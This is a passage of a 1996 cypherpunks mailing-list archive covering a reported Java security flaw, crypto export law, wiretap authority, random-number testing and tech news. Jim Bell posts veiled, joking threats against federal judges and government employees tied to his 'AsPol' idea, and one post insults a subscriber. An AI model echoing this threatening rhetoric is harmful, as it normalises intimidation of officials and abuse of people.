See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 28 Mar 1996 14:45:48 +0800
To: cypherpunks@toad.com
Subject: Re: WSJ on Big Java Flaw
Message-ID: <199603261814.KAA23974@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 3/26/96 -0500, John Young wrote:

>   Java was originally touted by Sun as a secure language. But
>   at least two other flaws have already been discovered in
>   the technology, including a less-serious problem uncovered
>   by the Princeton team last month. Sun's Ms. Mueller said
>   the problems have been correctable details in the way the
>   Java code is written, not problems with its basic design.

Having worked on a secure OS, with a small security kernel etc. etc. etc. I
realize that even those systems have bugs.  The Java people will work out
their bugs.  Others will read their code and find more bugs.  (It is to
Sun's GREAT credit that they are releasing their source under a not very
restrictive license.)  Eventually, in several years, Java security will be
ready for prime time.

Of course, for really valuable things, or the really paranoid, you
shouldn't connect your computer to a network.  The top dog certificate key
in SET is handled this way.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 28 Mar 1996 09:39:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Bad news from Judge Richey
Message-ID: <m0u1dVG-0008zqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 3/25/96 -0800, Timothy C. May wrote:
>At 3:28 AM 3/26/96, jim bell wrote:
>
>>I realize that this may appear to be a rather disrespectful tactic, but have
>>you considered reminding the judge that if you are not allowed to profit by
>>exporting encryption that the government doesn't want to see exported,
>>you'll just have to make money in some other way, and this may lead you to
>>talk to Jim Bell about implementing a program using encryption that doesn't
>>_need_ to be exported...legally anyway.
>
>Whoahh! Hold on there, Jimbo! You're crossing the line.
>
>You're coming perilously close to actually calling for the killing of a
>federal judge. My recollection is that a couple of folks have been arrested
>and charged for calling for the killing of judges.

Now now, Tim.  You know me better than that.  You know that I would never be 
so restrained as to call for the killing of ONLY ONE federal judge.

Seriously, however, I think you slightly mis-read my letter.  The implied 
"threat", if you are inclined to call it that, would simply be that if domestic 
software writers are prohibited from exporting encryption software, they 
might be inclined (and have time for) writing the entire AsPol system into 
software.  Once that happens, we won't have to worry about ITARs or any 
other governmental impediment.  At that point, the danger is not to one 
specific federal judge, and not even just to all of them, but every 
government employee at every level, working for every jurisdiction.

Judges, I presume, are quite familiar with accepting a sense of personal 
danger for the consequences of their bad decisions.  It would be an entirely 
different situation, I suggest, if it were made clear to them that the 
fallout from their misbehavior would ultimately be visited on a few million 
people.  And it would shock them to the core if it were 
explained that this could be done entirely legally, with the obvious 
exception of a few unidentifiable people who actually do the anonymous work.


Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Mar 1996 00:42:14 +0800
To: cypherpunks@toad.com
Subject: WSJ on Big Java Flaw
Message-ID: <199603261558.KAA25648@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Wall Street Journal, March 26, 1996, p. B4.


   Researchers Find Big Security Flaw In Java Language

   By Don Clark


   A team of Princeton University researchers said they
   discovered the most serious security flaw yet in the widely
   used Java programming language from Sun Microsystems Inc.

   The flaw could make it possible for unscrupulous hackers to
   destroy files or cause other types of damage on any
   personal computer that uses Netscape Communications Corp.'s
   Navigator program, said Edward Felten, a Princeton
   assistant professor of computer science who helped discover
   the flaw.

   Netscape Navigator, which uses Java, is the most popular
   software for browsing the Internet's World Wide Web. Java
   enables the creation of tiny programs, called applets, that
   are transferred from a Web site on the Internet to a PC
   running Netscape Navigator.

   Mr. Felten said that unscrupulous people who discovered the
   flaw could boobytrap a Web page on the Internet,
   essentially seizing control of the browser software of any
   PC that tapped into that page. At that point, the hackers
   could read or delete an entire hard disk of data files.
   "The consequences of this flaw are as bad as they can be,"
   he said.

   Sun, a computer maker based in Mountain View, Calif.,
   acknowledged the problem. "This one is a serious bug," said
   Marianne Mueller, a senior Sun engineer specializing in
   security issues.

   The company, alerted by Princeton on Friday, is already
   testing a software fix it has developed for the program and
   hopes to distribute it to Netscape and other users in about
   two days. Those companies are then expected to distribute
   updated versions of their Web browsers or other products to
   users.

   "We plan to fix it and get it out to our customers as fast
   as we can," said Jeff Treuhaft, a Netscape product manager.

   Java was originally touted by Sun as a secure language. But
   at least two other flaws have already been discovered in
   the technology, including a less-serious problem uncovered
   by the Princeton team last month. Sun's Ms. Mueller said
   the problems have been correctable details in the way the
   Java code is written, not problems with its basic design.

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Mar 1996 07:16:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Bad news from Judge Richey
Message-ID: <ad7d7c9912021004ee41@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:29 PM 3/26/96, jim bell wrote:

>Now now, Tim.  You know me better than that.  You know that I would never be
>so restrained as to call for the killing of ONLY ONE federal judge.

Your sense of humor is also called "digging your own grave." Better hope
your words don't get to prosecutors anxious to set an example....

>Seriously, however, I think you slightly mis-read my letter.  The implied
>"threat", if you are inclined to call it that, would simply be that if
>domestic
>software writers are prohibited from exporting encryption software, they
>might be inclined (and have time for) writing the entire AsPol system into
...

I read your article as essentially saying:

"Judges ought to remember that a box of shells costs a lot less than an appeal."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 28 Mar 1996 07:12:24 +0800
To: shabbir@vtw.org (Shabbir J. Safdar)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <v02120d45ad7e0e677c40@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:08 3/26/96, Shabbir J. Safdar wrote:

>We have to wake up and learn from the fight against the net censorship
>legislation.  This is realpolitik.  Congress will legislate crypto,
>whether we want them to or not.  This is not news anyone wants to hear,
>but we have to face up to it.

IMHO, Congress *will* outlaw non-GAK strong crypto. It is only a matter of time.


>This is actually very important.  The Leahy bill forces Joe's Key
>Warehouse to only divulge your key when they've been presented with a
>warrant that's on par with whatever they used to get your original
>communication.  That means that Louis Freeh can't issue an
>administrative subpoena to get your key, after he's got a judge to
>allow the FBI to search your house.  They have to get a judge involved
>for both parts.

It is a widespread myth that wiretaps require warrants. Court ordered
warrants are not required for a wiretap. They have not been required since
the Digital Telephony Bill passed. That the net, the media, and even
attorneys are so blissfully unaware of this, even years after the provision
doing away with requiring warrants became law, is one of the finest
examples of cognitive dissonance you are ever likely to find. It is too
disturbing to believe it, so the mind ignores the facts.

Excerpt from the Digital Telephony Bill

quote
SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
(a) Capability Requirements: [...] a telecommunications carrier shall
ensure that its equipment, facilities, or services, that provide a customer
or subscriber with the ability to originate, terminate, or direct
communications are capable of--

(1) expeditiously isolating and enabling the government, pursuant to a
court order or other form of authorization, to intercept, [...] all wire
and electronic communications [...].
end quote

*Other forms of authorization*, other than a court ordered warrant that is,
are explicitly allowed. Nowhere in the bill, or anywhere else AFIK, is
stated what form these other forms of authorization can take. No limits
whatsoever as to what the government can do.

"My supervisor approved it" may well suffice.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Mar 1996 07:12:47 +0800
To: cypherpunks@toad.com
Subject: Traffic Jams on the Internet
Message-ID: <01I2SQ2FUST88ZDZ7I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It occurs to me that it would be good if people sent in some
non-governmental/hierarchial solutions to this problem, such as ones using
digital cash as "postage" for prioritized mail.
	-Allen

From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 15 Mar 1996 05:34:50 -0500 (EST)
From: Automated Mailer <stsful-l-prog@x.nsf.gov>
To: STSFUL-L Mailing List <stsful-l@x.nsf.gov>
Subject: [Press Release] TRAFFIC JAMS ON THE INTERNET

The file "pr968.txt" has been added to the STIS system.
This file is a NEW file.

Reference material is located at the end of this message.
-----------------------------------------------------------------------
Title  : TRAFFIC JAMS ON THE INTERNET
Type   : Press Release
NSF Org: OD / LPA
Date   : March 14, 1996
File   : pr968


Media only contact:
Beth Gaston                                                      March 14, 1996
(703) 306-1070/egaston@nsf.gov                                      NSF PR 96-8


All others contact:
Mark Luker
(703) 306-1950/mluker@nsf.gov

TRAFFIC JAMS ON THE INTERNET:
New Connections Program to force Internet Technology

        While the Internet grows in popularity, a related problem is growing:
traffic jams.  The increased demand of more people on-line using increasingly
sophisticated tools has caused delays in transmission unacceptable for some
scientific uses.

        The National Science Foundation has introduced a new twist to its
connections program: emphasizing innovative solutions that may have broad
implications for all Internet users.  The program will look for meritorious
applications that require high performance networking, and will then fund
development by university and college campus network service providers.
Technology developed for this program will likely affect future operation of
the Internet.

        The technology will introduce the idea of prioritization to Internet
traffic. For example, if planning to use the U.S. Postal Service to send a
package, you have options: overnight mail, first-class service, or third-class
service.  The rate of the package delivery is contingent on how it is
designated.  Freeways around major cities often have either express toll roads
or high-occupancy-vehicle lanes to bypass congested areas.  Similarly, NSF's
connections program is expected to spur the development of switches and
routers to help alleviate bottlenecks of information.

        "There is no single solution.  We hope this grant program will
stimulate the development of a technological option for the Internet, to
introduce prioritization and provide a new style of connection that gives a
guaranteed level of service at a national level," said Mark Luker, manager of
NSF's connections program.

        Currently on the Internet, all packets of information are treated
alike. While this worked fine before the popularization of the Internet, it
now interferes with some uses that require high performance service.  One
example is to use high performance connections of multiple small computers  to
create a large workstation cluster distributed across the nation.  The
Internet is currently too congested for such a system.  Teleconferencing or
videoconferencing also places too great a need on the current capacity.  And,
some scientific instrumentation requires specific fast connections, though not
necessarily high bandwidth.  Interruptions or delays caused by Internet
congestion could be fatal to experiments.

        One solution might include prioritization of traffic on the Internet.
Another solution might involve diverting specially coded traffic to high
performance, special use networks, such as NSF's vBNS (very high speed
Backbone Network Service).

-end-

NSF was created as an independent federal agency in 1950, uniquely charged
with promoting the progress of all fields of science and engineering.  Today,
as a leader and steward of the nation's science research base, NSF supports
both research and education through competitive grants to about 2,000
universities and other institutions.  NSF receives some 60,000 research
proposals each year and funds about one-third of them.  ** News releases and
tipsheets are available electronically on NSFnews.  To subscribe, send an
e-mail message to listmanager@nsf.gov.  In the body of the message, type
"subscribe nsfnews" and then type your name.  For more guidance, send a "help"
message to listmanager@nsf.gov.  Also see the NSF Home Page (http://
www.nsf.gov), under News of Interest.
-----------------------------------------------------------------------
End of pr968.txt
-----------------------------------------------------------------------
                     ** FOR YOUR REFERENCE **

This message was mailed to the STIS mailing list "STSFUL-L".  To get off
the list, send the following message to "ListProc@stis.nsf.gov":

     unsubscribe STSFUL-L

If you receive an error message, send the following message for more 
information:

     help unsubscribe

If, after 24 hours, you haven't received *any* response from ListProc
send a message to "stis@nsf.gov". A human will read your message.

------- End of forwarded message -------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 28 Mar 1996 07:12:04 +0800
To: Adam Shostack <tcmay@got.net (Timothy C. May)
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u1hAh-00090wC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 3/26/96 -0500, Adam Shostack wrote:
>Timothy C. May wrote:
>
>| My point is that I see no compelling legislation that is needed. If enough
>| people in Washington really want increased length in _exported products_
>| (remember the "exported" part), the Congress and the President should find
>| it easy enough to get said products on to the Approved List. (I note that
>| the Leahy Bill really doesn't change this system anyway...some products go
>| on the list, some don't...the law only seems to say that when the horse has
>| already left the barn, i.e., when "comparable" products are already in
>| fairly wide use outside the U.S., then the products should be put on the
>| approved list. Big deal.

>	I'm forced to disagree on this point.  I think that the
>comparable product has the potential to be a very big deal; it means
>that any product using IDEA or 3DES may become exportable, because
>such products are available outside the US.
>
>	It may be that wide use will be quibbled over, but DES, weak
>as it is, is widely used outside the US, and IDEA and 3DES will be.
>Thats why this legistlation will fail to pass.

I think Tim already pointed out that the danger in this kind of conditional 
approval is that it would be used to restrict export of new _usages_ for 
cryptography based on their "political correctness" quotient, rather than 
simply on the basis of level of security (length of codes.)   In other 
words, just because a program used 3DES or IDEA would not automatically make 
it exportable.  This may sound pessimistic, but unfortunately pessimistic 
turns into "accurate" far too often.

Far more acceptable (and useful to us)  would be a rule which would mandate 
the government's allowing the export of any program that had, say, the key 
security provided by IDEA or less, regardless of what it did with that 
encryption.  (Not that I want _any_ restrictions; it's just that such a 
limit would make it impractically large to attempt to crack.)

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Mar 1996 07:09:45 +0800
To: kermie@paonline.com (Dan Ringley)
Subject: Re: DESCRIBE
In-Reply-To: <v05000500ad7dabd636ba@[198.69.90.213]>
Message-ID: <199603261927.OAA13236@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Ringley writes:
> Take me off of the God Forbidden list already! Now!

Unfortunately for us, we are not in a position to do so, as we are
subscribers to the list, not the management. Doubtless, being a
mentally challenged person, you will continue to harrass us, post
obnoxious messages, and do other things in spite of the fact that none
of your victims will be in a position to help you out.

If you had an ounce of intelligence, of course, you would simply use
the automated unsubscription instructions you got when you
subscribed. Sadly for the rest of us, who will now have to deal with
your whining indefinately, intelligence is a commodity in precious
supply around this planet.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Mar 1996 07:11:42 +0800
To: peponmc@fe3.rust.net
Subject: Re: Yeo, Pea-brained Imbecile
Message-ID: <01I2SRJHG8U28ZDZ7I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"peponmc@fe3.rust.net"  "Michael Peponis" 19-MAR-1996 10:17:59.06

>Given the plethera of reports like this, I will start maintaining a list of 
>country that will not be given access to my site, no FTP, no HTTP, no nothing,
>on top of that, I will hard code into all the new versions of my network aware
>programs to check  for a domain subfix, if it is on of the black list, the
>software will not  function.

	I would suggest making an exception for material that the country in
question _doesn't_ want available... you don't want to do their work for them.
Of course, if that it's from a .gov-type site in that country (kind of hard to
tell without the domain, but...), that's another story.

>Filtering works both ways, they filter out the political and sex groups on 
>their end, we filter out the technical information on ours, I hope they enjoy 
>what is left, which is not much.

	This brings up the related topic of filtering mail lists the other
way around. There have been times that I've wanted to email everyone on a
mailing list _except_ one or two people. It's massively inconvenient to try to
do this without automated software, for a large mailing list. Therefore, I'd
be interested in majordomo/listserv/whatever modifications that would enable
doing so. Of course, for anything significant having seperately encrypted
messages to each person (as per that thread a bit back on encrypted mailing
lists) would be necessary.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Mar 1996 11:53:47 +0800
To: tcmay@got.net
Subject: Re: Tim's friend's mildly retarded son
Message-ID: <01I2STD1A5SI8ZDZ7I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 22-MAR-1996 00:47:25.47

>At 11:17 PM 3/21/96, E. ALLEN SMITH wrote:

>>        This topic's relevance to Cypherpunks, aside from the confirmations
>>that you mentioned, is low... aside from that it's of interest to Extropians
>>such as myself and Tim May.

>In recent months, a self-appointed group of list members have taken upon
>themselves to argue that _anything_ that does not have to do with certain
>topics they find appropriate is "not related to crypto, so take it
>elsewhere." Regrettably, most reasonable people have grown quiet about
>anything that smacks of politics or ideology, leaving the field clear for
>certain ranting lunatics.

	Umm... I was referring to the discussion in regards to whether
"smart drugs" work or not, not the discussion on the FDA. Sorry if I wasn't
clear. Admittedly, some of my comments with regards to the FDA's
ultraconservative/better-safe-than-sorry (depending on whose side you take)
policy can be extended to an analysis of the NSA's behavior - putting the
brakes on cryptography even after it becomes useless to do so, and after it
becomes _necessary_ for America's future (commerce et al).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Mar 1996 14:42:53 +0800
To: llurch@networking.stanford.edu
Subject: Re: (X:x)e$ 's other use
Message-ID: <01I2STLT1O4C8ZDZ7I@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 22-MAR-1996 05:45:53.77

>Digital cash, if people can be convinced to trust it, will be a wonderful 
>thing because of its security, convenience, and anonymity features. I'm 
>sorry, but I just don't buy this "corrupt currency" schtick.

	While corrupt isn't quite the right word, the dollar is a
politically-influencable currency. And the politicians tend to press for
higher inflation and lower unemployment, because that gets them elected. The
Fed has done an actually rather admirable job of standing up to the pressure
(compared to how they might have behaved), but that we've got real inflation
testifies to that they haven't been completely successful. Moreover, the
banks that are in the Federal Reserve network have a motivation to have low
interest rates for what _they_ get charged, despite this inflating the
currency... thus, they've got some motivations to mismanage things.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 28 Mar 1996 11:58:17 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Employers need pseudonymous off-shore remailers
Message-ID: <v02120d4ead7e45b17945@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Today, I tried to find out what it takes to hire someone who is in the US
on a student visa (F-1) as a consultant or part-time employee. The person
is an expert in his field. I don't know anyone available with a similar
proven track record.

I thought, no problem, there are INS exceptions for foreign experts. So I
set on a quest to find out what it takes to get the INS to grant that
person a work permit.

The process is simple. All I have to do is ask the California Employment
Development Department for a labor certificate, give that to the INS
together with an application and the required fees, after which they'll
issue the permit.

Getting the certificate takes usually eight months, processing the
application about four months. So the whole process takes about *a year*. I
was stunned. Here I am willing to hire someone to work on a product that
will generate taxes in the US, and the bureaucrats are asking me to wait a
year. These people have lost any touch with reality.

Not that *I* would do such a thing, but an off-shore pseudonymous remailer,
with payment in ecash might go a long way...

[Disclaimer: Speaking only for myself, not for my employer]

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred <admin@dcwill.com>
Date: Thu, 28 Mar 1996 12:35:52 +0800
To: cypherpunks@toad.com
Subject: Random Number Testing
Message-ID: <199603270200.SAA18549@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain



JonWienke@aol.com writes:
> > The "randomness" of the output of my sieve is obviously not perfect.
> >  However, it will remove bytes from a data stream that "randomness" tests
> > describe as "nonrandom".

And Perry writes:
> You are displaying a profound ignorance of the notion of "random"
> here. An individual byte cannot be random or nonrandom. Random is a
> statistical property, and therefore can only apply to a mass of
> data.

The limitation seems to be in the testing process.

An inviolable rule of test and measurement is that the testing process
must have a higher degree of accuracy and precision than is expected from
the item under test. If all you have is a non-graduated stick one meter 
long, you can't measure increments of less than one meter unless you add 
some additional resolution to the system (such as a human's judgment
that the object is four sticks, plus about another third of a stick,
long).

Our ability to synthesize pseudo-random data, and the degree to which
it approaches true random data, is limited by our ability to discern
between the two. If the best testing process available yields the
same results for the output of a true RNG and a particular PRNG, what
can be done to improve the randomness of the PRNG? How could we tell
the difference based on the data itself? 

About all you could do would be to critique the PRNG or sieving process 
from an empirical perspective and hope that you weren't introducing some 
other non-random bias to the system. I'm sure that some perfectly random 
data would be discarded as being non-random, especially for a small sample 
size. The sequence  HHHHTTTT doesn't look random, but this outcome of 8 
flips is equally probable for a "perfect" coin. Do you keep this data or 
toss it because it doesn't "look" random? If you toss it, aren't you
removing entropy from the sample?

It may be (relatively) easy to say that radioactive decay is a truly 
random process and a sieve which discards certain re-occuring values 
is not. Improving the testing process, and increasing the size of the
data used for that testing, will improve the sieve output. However,
it looks like an asymptotic situation: the PRNG can approach, but never
quite reach, the true RNG case. As long as human analysis and discretion
is involved, there will always be a certain amount of non-randomness
in the output of a PRNG. 

My question: if you don't know the source of the data, how can you
_really_ determine if it's random enough for crypto use? Given any
PRNG string of a certain length, does the fact that I might be able to 
find that exact same data string buried in a mountain of truly random 
data mean that it's suitable for crypto use? If you knew that I created 
the data from the clock of my workstation, then maybe not. But otherwise?

Fred  <admin@dcwill.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 28 Mar 1996 11:51:17 +0800
To: cypherpunks@toad.com
Subject: Re: Bad news from Judge Richey
Message-ID: <199603270201.SAA20273@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 3/25/96 tcmay wrote:
-------------------

jim bell:

>talk to Jim Bell about implementing a program using encryption 
that doesn't
>_need_ to be exported...legally anyway.


tcmay:

You're coming perilously close to actually calling for the 
killing of a  federal judge. My recollection is that a couple 
of folks have been arrested  and charged for calling for the 
killing of judges.

-------------------


Any half-wit falling for Bell's agent provocateur setup will do 
hard time, or maybe get popped by his twitchy TLA watchers.


The son-of-a-bitch's baiting with pigeons, no question. He's 
too myopic to see he's setting up falcons for gutting by 
high-circling eagles, who'll claw him too. Bell's going down 
blind-sided with his gulls, all easy prey.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Mar 1996 12:37:29 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 24 March 1996
Message-ID: <01I2T0RRDGQO8ZDZIP@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 26-MAR-1996 19:24:26.78
To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"
CC:	
Subj:	Edupage, 24 March 1996

*****************************************************************
Edupage, 24 March 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

>ONLINE TRADING 
>Lombard International Brokerage in San Francisco and Pawws Financial Network
>in New Jersey are two brokerage houses that have opened Internet trading
>services, allowing customers to monitor their portfolios and retrieve
>corporate and financial information from brokerage databases or through
>links to other Web sites.  "You're seeing the culmination of the information
>brokerage -- with customer service, advanced analytical tools, and news
>available at one place and one time on the most incredibly productive medium
>that ever existed, the Internet," says Lombard's CEO.  By incorporating a
>Java applet into their Web design, Lombard's Web site refreshes its
>information every 30 seconds so that intra-day trading charts are
>automatically updated.  The Pawws trading system, a tailored version of the
>Security APL cash-management system, is used by several other investment
>houses to display their wares.  "Why should we spend time and money to tell
>people how to get a modem to work?  We provide brokerage -- not technical --
>services," says one user.  (Information Week 11 Mar 96 p64)  And discount
>broker Charles Schwab & Co. will begin this May to allow its customers to
>trade listed and over-the-counter stocks, get real-time quotes, and access
>account information using the Schwab site on the World Wide Web.  (Atlanta
>Journal-Constitution 22 Mar 96 F3)

	They're using _Java_ to do this? 

>PORN IS A GOLD MINE FOR IDT
>Tiny IDT Corp. has found a way to differentiate itself from the
>run-of-the-mill Internet access provider.  It pitches its service to porn
>aficionados, with ads like:  "With IDT, I access *all* Internet services.  I
>said *all* Internet services -- get that smirk off your face."  In fact, its
>service and pricing are similar to everyone else's, but its subscriber base
>has grown six-fold to 65,000 in the past six months using this approach.
>"IDT is looking for a marketing niche, and given how we think the primary
>Internet audience is -- lonely 20-something and 30-something males -- why
>not aim that niche at them?" says Gary Arlen, an Internet consultant. (Wall
>Street Journal 22 Mar 96 B4)

	An interesting way to differentiate oneself. I would suggest that
anonymnity (i.e., C2) would be a logical add-on.

>NETSCAPE TO GET IN ON THE PHONE-BY-INTERNET ACTION
>Netscape co-founder Mark Andreessen says that within six months the company
>will build into its Navigator program voice software (which it calls Insoft)
>for making low-cost long distance calls via the Internet into its Navigator
>program and that long-distance phone companies increasingly won't be able to
>justify their rates for telephone service.  (Sydney Morning Herald 13 Mar 96
>via Individual Inc.)

	Any possibility that Netscape might build in some form of cryptography?
I realize ITAR rules would make this problematic, but perhaps some sort of
out-of-country deal for putting in the hooks for PGPhone could be done.
	-Allen

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by the Office of Information Technology,
>University of North Carolina at Chapel Hill.

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage Graham Greene (assuming that your name is Graham Greene;
>if it's not, substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu and in the body of the message type: unsubscribe
>edupage.   (Subscription problems?  Send mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Mar 1996 22:57:29 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <ad7df7b315021004da44@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It pains me to often be the one who throws cold water on what seems to be a
good idea, and what comes from a well-intentioned person. But I have to
call 'em as I see 'em. And maybe I'm wrong. But here are my thoughts.

At 10:16 PM 3/26/96, aba@atlas.ex.ac.uk wrote:
>The idea of putting together a CD with crypto stuff is an excellent
>IDEA, and one which I very much welcome.
>
>However a question .. are you (Ben) located in the US?  If so...
>
>that rules out overseas buyers unless you fancy messing with ITAR...
>Is it possible that you could come to some arrangement with some one
>outside the ITAR fence who has a CD writer (any one reading have one?)
>put together the same CD for those outside the US?

A CD-ROM containing crypto programs, source code, etc. sounds like a nice
idea. But it falls apart for various reasons. For brevity, I'll just list
some:

1. The CD-ROM "freezes" the various programs, archives, etc. at the moment
the files are finalized and the CD-ROMs are pressed (or burned individually
on a CD-R, at somewhat higher per-copy price). If the author of the CD-ROM
is not committed to updating the CD-ROM at frequent intervals--say, every
few months--then the programs will exhibit "version decay" and be nearly
useless.
The next point is the reason.

2. The Web does a better job at making the latest versions instantly
accessible. True, a CD-ROM will generally have faster access, but I care
more about getting the _latest_ version of PGP, even if takes a minute or
two to snarf off the Web. That I could get an _older_ version of PGP in
fractions of a second off this CD-ROM is not compelling to me. (And
fractions of a second is too charitable: in actuality, I'd have to locate
the CD-ROM, dismount anything already mounted, mount the CD-ROM, search it
for "PGP," etc. Probably not even faster than using Alta Vista and
downloading.)

3. Where CD-ROMs really shine over modem alternatives is, of course, for
very large files. Images, MPEG or Quicktime movies, etc. "Multimedia" being
the operative term. For crypto, this is not an issue. (Except for list
archives, where having a few hundred megabytes of articles might be nice.
However, the absolute KILLER of this idea is the staleness problem mentione
in Point #1: if the archives on CD-ROM lack the most recent month or two,
their usefullness drops precipitously. If the CD-ROM is a year old, and no
updates have appeared, then its archives are useful only to list
historians.

(In other words, I will almost always go to up-to-date archives on a Web
site rather than dusting off a CD-ROM that was issued several months ago.
And a CD-ROM every several months is more than I think we can hope for. Or
pay for.)

4. The Web approach allows powerful search engines, links from other pages,
and--importantly--multiple jurisdictions. The PGP could come from the U.S.,
the Digital Postage code from Sweden, and so on. And, again as noted in #
1, the developers could keep improving and iterating the code.

And so on....I can think of more problems, but these are enough.

I have no interest in quashing the enthusiasm of Mr. Holiday. Nor do I have
the power to do so, except by my comments. But I'd hate to see him invest
several months of his life preparing this CD-ROM only to find that it is a
novelty item, ordered by some people to be "cool," with actual downloads of
the latest versions of software being done the way it is now done--the Web.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
